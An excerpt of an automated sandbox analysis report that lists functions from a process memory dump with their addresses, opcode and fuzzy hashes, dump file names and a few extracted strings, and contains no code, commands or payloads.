                                                                        • Opcode Fuzzy Hash: 63249743a8bee1b3b56efc2b8e8d2213dc896eed9bb0c68e9e56490a74edccb7
                                                                        • Instruction Fuzzy Hash: 1F51837AD017299BCB14DFAED841AAEF7B4AF0C651F054129E912BB340DBB49901CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0311E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EXT-
                                                                        • API String ID: 0-1948896318
                                                                        • Opcode ID: 5a57aaf980b900c8976c239467003e055393573cf8c6738c1c77f9efddfc1936
                                                                        • Instruction ID: fbd3a1e7bd8f6b83dd555f01674c956e57cf62a1dded8a28c7617df1e670225e
                                                                        • Opcode Fuzzy Hash: 5a57aaf980b900c8976c239467003e055393573cf8c6738c1c77f9efddfc1936
                                                                        • Instruction Fuzzy Hash: 264180766093119BE710DBB5C840BABB7E8AF8C714F440A3DF984DB180EB74D954C7A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0317C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: 6e6feaa643b7d42d4d1be8cc0c07438378c22b56e53aff25d7c676dd5d4ac9a4
                                                                        • Instruction ID: 14c377d9428f6210ff43886735fe15e5196f0d71e3220291acc182958e2c2e0f
                                                                        • Opcode Fuzzy Hash: 6e6feaa643b7d42d4d1be8cc0c07438378c22b56e53aff25d7c676dd5d4ac9a4
                                                                        • Instruction Fuzzy Hash: 134121B5D0162CABDB21DB60CC84FDEB77CAB49714F0445E5EA18AB140DB709E898FE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03196B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #
                                                                        • API String ID: 0-1885708031
                                                                        • Opcode ID: b8005370d39a4812af308040e2b6d2225ddbc6a425139a188f7376fa5696081e
                                                                        • Instruction ID: b75132f01995efc612e410919006864fe963546e434c2aeac5782edd8e97c81d
                                                                        • Opcode Fuzzy Hash: b8005370d39a4812af308040e2b6d2225ddbc6a425139a188f7376fa5696081e
                                                                        • Instruction Fuzzy Hash: 7A311631A007189BEF21DF69C850BEEB7A8DF0D714F14406AF841AB281DB75E945CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0317CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: c9dee4618b81cf151bb45efd546bfd0bb35fda2d6ced8e8b58b03d593063122f
                                                                        • Instruction ID: 49d8840dd523c93c21378f0a5ffb29d9c0d3e372dbdf60ea17b615e501f23b4d
                                                                        • Opcode Fuzzy Hash: c9dee4618b81cf151bb45efd546bfd0bb35fda2d6ced8e8b58b03d593063122f
                                                                        • Instruction Fuzzy Hash: 8E312536D40615AFDB15DB59C849EAFF778EF887A0F194169F801AB250D7309E00CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0318892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0318895E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                        • API String ID: 0-702105204
                                                                        • Opcode ID: b92f56fda1bb0700c72540f21714f25a2ba1ffeeb740c91e04d99c182e51c551
                                                                        • Instruction ID: f78dccfb12d15be214b557a3ba85dcc92065e45732d1bede42770b7d11bca62a
                                                                        • Opcode Fuzzy Hash: b92f56fda1bb0700c72540f21714f25a2ba1ffeeb740c91e04d99c182e51c551
                                                                        • Instruction Fuzzy Hash: A601D035714301DFD724FB55DC84B5ABF66EFCD650B480518E5411A553CF60AC82CEAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031A2000 Relevance: .8, Instructions: 757COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e894ec7b948f5944d147993e7c16f4d5c0ac9a08a9846172138f5f2ec8e71eaa
                                                                        • Instruction ID: 96e1f5d3e58074bd819333c00687b875fe5d03c130a909fe2ae60bb1256da661
                                                                        • Opcode Fuzzy Hash: e894ec7b948f5944d147993e7c16f4d5c0ac9a08a9846172138f5f2ec8e71eaa
                                                                        • Instruction Fuzzy Hash: 4442BE3A608B419BD725CF6CC890A6BF7E9AF8C701F080D2DF9869B250D771D946CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03198158 Relevance: .6, Instructions: 617COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 582e37b2bb5a94d74c8d4a11e54966e0760a43be54039e870d603ec0cca33274
                                                                        • Instruction ID: acf957623322ec20aa15c87d27b482157d91d0d91e61eeeaeff37f5f2903e4b5
                                                                        • Opcode Fuzzy Hash: 582e37b2bb5a94d74c8d4a11e54966e0760a43be54039e870d603ec0cca33274
                                                                        • Instruction Fuzzy Hash: 6F424B75A102198FEF24CF69C881BADF7F5BF49300F19819AE949EB241D7349985CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031AA118 Relevance: .6, Instructions: 591COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef2e02be3014e09a91258ff4c9089ee99a5e8679c16c1597474da8c205eeb79c
                                                                        • Instruction ID: 6992566c57312aa597f4c0073240fd205eb4e285789c05f0bf49f4b6663e3d07
                                                                        • Opcode Fuzzy Hash: ef2e02be3014e09a91258ff4c9089ee99a5e8679c16c1597474da8c205eeb79c
                                                                        • Instruction Fuzzy Hash: DE22C178604A518FDB29CF2DC094372B7F1AF4D302F0D849AE9968F286D735E492CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03106A50 Relevance: .5, Instructions: 548COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f6e40643dc387f955b1219a04e5ff57655a79d07ea7df05d4ed2322a80ce9e3
                                                                        • Instruction ID: c03001b4f550249aa40b64331d38a2bc2c889b5e8f60248ef54bf9fb9027e11b
                                                                        • Opcode Fuzzy Hash: 6f6e40643dc387f955b1219a04e5ff57655a79d07ea7df05d4ed2322a80ce9e3
                                                                        • Instruction Fuzzy Hash: 68329D75A00205DFDB24CFA8C480BAAB7F5FF4C310F288569E956AB391DB74E861CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03124A35 Relevance: .4, Instructions: 423COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction ID: 548876980bff2da8ce015c3289a0861a2547f02e28afc3d3797037bc21ad8520
                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                        • Instruction Fuzzy Hash: 15F15575E002299BDB18CF9AD990BAEFBB5BF4C710F098169E805EB344DB74D861CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0319892B Relevance: .4, Instructions: 386COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40c1b1162d8a08eb0621a5968ea3565de6845aa09d9473bffd4175b3e838bc78
                                                                        • Instruction ID: 9694af97b81c55245b5a4e6baac75b126931139cba66017fce538d3a8809ee20
                                                                        • Opcode Fuzzy Hash: 40c1b1162d8a08eb0621a5968ea3565de6845aa09d9473bffd4175b3e838bc78
                                                                        • Instruction Fuzzy Hash: 03D1E272A006099BEF19CF69C841AFEB7F5AF8D304F19816AD856E7240E735E905CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031065D0 Relevance: .4, Instructions: 383COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 32bdfe4c168dcfbc09bf09020ed5d03a953fc27a26c883f38b4188bc408fb163
                                                                        • Instruction ID: 246dfa23959717eaf215f599755c58d337e45c3f45038abbc5fc80ce58c866e2
                                                                        • Opcode Fuzzy Hash: 32bdfe4c168dcfbc09bf09020ed5d03a953fc27a26c883f38b4188bc408fb163
                                                                        • Instruction Fuzzy Hash: 0EE1AC71608341CFC714CF28C080A6AFBE5FF89314F098A6DE8998B391DB71E955CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030F8397 Relevance: .4, Instructions: 380COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 10046cb742737bd77e31609cbf52c2e6329c7fc2870b15991b525af329ea344c
                                                                        • Instruction ID: 6a07c04854f4d9e35b39e0bb6d078deb12756e8cc495e21976e4a6a11d92146f
                                                                        • Opcode Fuzzy Hash: 10046cb742737bd77e31609cbf52c2e6329c7fc2870b15991b525af329ea344c
                                                                        • Instruction Fuzzy Hash: 1ED1AF75A0571ADFCB14DF65C890AFFB7A5BF48204F08C629FA269B680E730E945CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03188243 Relevance: .3, Instructions: 322COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction ID: 2d73aa95715ac6e215b18d9263a1c7005e2426fb97eaded41263e0df6ab6776f
                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                        • Instruction Fuzzy Hash: ADB14275A00708AFDB24EF95C940EABB7BAFF8C304F944469A9429B790DB34E945CF14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03110535 Relevance: .3, Instructions: 300COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                        • Instruction ID: a0a289322cfc3642f5e4640be49c54d2111ba1730ea6c381432faa482fe49f42
                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                        • Instruction Fuzzy Hash: 71B12775A00645AFDB15CBA8C850BFEF7FAAF4D300F1901A9D552DB285DB30E991CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031083C0 Relevance: .3, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 84a90e9cd33027c22bccafcbaa351a1c4bb1e31a3b03958c026e8a923c2f56e6
                                                                        • Instruction ID: 0be8652fd0d1d7b67d503f3c8a162205ff1bd60879b29d325be953b76b5f937e
                                                                        • Opcode Fuzzy Hash: 84a90e9cd33027c22bccafcbaa351a1c4bb1e31a3b03958c026e8a923c2f56e6
                                                                        • Instruction Fuzzy Hash: 0AC15874208340DFD764CF59C484BABB7E9BF88304F48496DE9898B291D7B4E948CF92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 030FC427 Relevance: .3, Instructions: 280COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abb95002f2079573e3285478ae041691f115b35d3001ed21b8acc10fbcd4cbfc
                                                                        • Instruction ID: e126c18bcf68c5cd97786690b4122dcaaa375fead1ac4f8edc571b3eae02911e
                                                                        • Opcode Fuzzy Hash: abb95002f2079573e3285478ae041691f115b35d3001ed21b8acc10fbcd4cbfc
                                                                        • Instruction Fuzzy Hash: E3B16174A012698FEB64DF54C891BB9B3F5EF88700F0485E9D54AEB640EB709DC6CB20
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0312E5E7 Relevance: .3, Instructions: 278COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 06cb8143056ad0c7f90bef8d79a91a2593bb3e75f068a6e608570aa0a3a7a956
                                                                        • Instruction ID: 486af07a1fbd08b1ca4c70b36434fb320c67040d23baeb5c6a7cd303dad3ec7f
                                                                        • Opcode Fuzzy Hash: 06cb8143056ad0c7f90bef8d79a91a2593bb3e75f068a6e608570aa0a3a7a956
                                                                        • Instruction Fuzzy Hash: E7A14531E00728AFDB25DB98D844FAEBBB5EF0D714F090165E911AB280D7749DA1CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03140185 Relevance: .3, Instructions: 276COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 883fd4f0ce128988095288b1665e52b164e067504790068f26bd15b89d702799
                                                                        • Instruction ID: 26db51b0756b0f3ce599d85101045d20ec5671368377674e2b00cd35f5ec9ce9
                                                                        • Opcode Fuzzy Hash: 883fd4f0ce128988095288b1665e52b164e067504790068f26bd15b89d702799
                                                                        • Instruction Fuzzy Hash: D0A1F370B007169FDB28DF66D990BAAF7B5FF4C314F084129EA459B281EB34E855CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D4500 Relevance: .3, Instructions: 275COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a8838fc5dd42c05f79f2d283d54e4db6fbee7428ecc732d14a5b7ef1d6f1fd47
                                                                        • Instruction ID: c0d522a4b013dffadefa3bf075216cfda8ee4d7ee73761587519cffe32ac1369
                                                                        • Opcode Fuzzy Hash: a8838fc5dd42c05f79f2d283d54e4db6fbee7428ecc732d14a5b7ef1d6f1fd47
                                                                        • Instruction Fuzzy Hash: 46A1F972A04711AFC725DF69C980B6AB7EAFF4E344F090928F5899B250DB34EC51CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031D2B57 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction ID: 303dba3f38d04a098f0d41156d1475f6c1902b0dfeff5ba72eb41475db70e7e0
                                                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                        • Instruction Fuzzy Hash: C7B12A75E00619DFDF28CFA9C880AADF7B5BF4D310F188569E825A7354D730A952CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031860E0 Relevance: .3, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
